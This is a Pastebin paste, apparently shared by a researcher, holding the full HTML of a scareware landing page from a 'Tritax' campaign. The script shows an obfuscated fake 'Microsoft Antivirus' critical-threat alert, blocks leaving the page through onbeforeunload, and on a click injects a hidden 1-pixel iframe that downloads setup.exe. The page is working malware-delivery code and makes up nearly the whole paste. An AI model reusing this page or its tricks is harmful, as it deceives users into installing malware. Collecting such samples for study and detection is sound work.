Advertisement
ydklijnsma

Tritax campaign landing page V1

Feb 2nd, 2014
1,660
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.69 KB | None | 0 0
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
  2. <html>
  3.     <head>
  4.         <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  5.         <meta content="IE=5.0000" http-equiv="X-UA-Compatible">
  6.         <meta name="GENERATOR" content="MSHTML 10.00.9200.16660">
  7.         <script>
  8.             var truster=Math.random();
  9.             window.moveTo(truster-2*truster+truster,truster-2*truster+truster);
  10.             window.resizeTo(screen.width,screen.height);
  11.             var NeedADoctorString="Micro"+"soft_NeedADoctor|Antivirus_NeedADoctor|has_NeedADoctor|found_NeedADoctor|critical_NeedADoctor|process_NeedADoctor|activity_NeedADoctor|on_NeedADoctor|your_NeedADoctor|PC";
  12.             var kuchko="\nYou_NeedADoctor|need_NeedADoctor|to_NeedADoctor|clean_NeedADoctor|your_NeedADoctor|computer_NeedADoctor|to_NeedADoctor|prevent_NeedADoctor|the_NeedADoctor|system_NeedADoctor|breakage.";
  13.             var eroskopli=1;
  14.         </script>
  15.         <title>Alert</title>
  16.     </head>
  17.     <body topmargin="0" leftmargin="0" bgcolor="#ffffff">
  18.         <table width="100%" height="99%" border="0" cellspacing="0" cellpadding="0">
  19.             <tbody>
  20.                 <tr align="center" valign="middle">
  21.                     <td>
  22.                         <img width="617" height="345" id="al" src="message.png" border="0" usemap="#maper">
  23.                         <map name="maper">
  24.                             <area onmousedown="kloustrafobia();" shape="rect" coords="544,12,593,33">
  25.                             <area style="cursor: pointer;" onmousedown="eroskopli=0;" onclick="kolokolchik();" shape="rect" coords="480,287,578,308">
  26.                         </map>
  27.                     </td>
  28.                 </tr>
  29.             </tbody>
  30.         </table>
  31.         <div id="contentInner"></div>
  32.         <script>
  33.             result=NeedADoctorString.replace(/_NeedADoctor\|/g, ' ')+kuchko.replace(/_NeedADoctor\|/g, ' ');
  34.             function kakashka(){
  35.                 return eroskopli==1?result:false;
  36.             }
  37.             window.onbeforeunload=kakashka;
  38.        
  39.             function kloustrafobia(){
  40.                     alert(result);
  41.             }
  42.             kloustrafobia();
  43.        
  44.             function kolokolchik(){
  45.                 var ds = "IFR";
  46.                 ds+="AME";
  47.                 var aafd = document.createElement(ds);
  48.                     aafd.src = 'http://' + document.location.hostname + '/download/setup.exe';
  49.                 aafd.style.width = "1px";
  50.                 aafd.style.height = "1px";
  51.                 aafd.style.border = "0px";
  52.                 document.getElementById('contentInner').appendChild(aafd)
  53.             }
  54.         </script>
  55.     </body>
  56. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement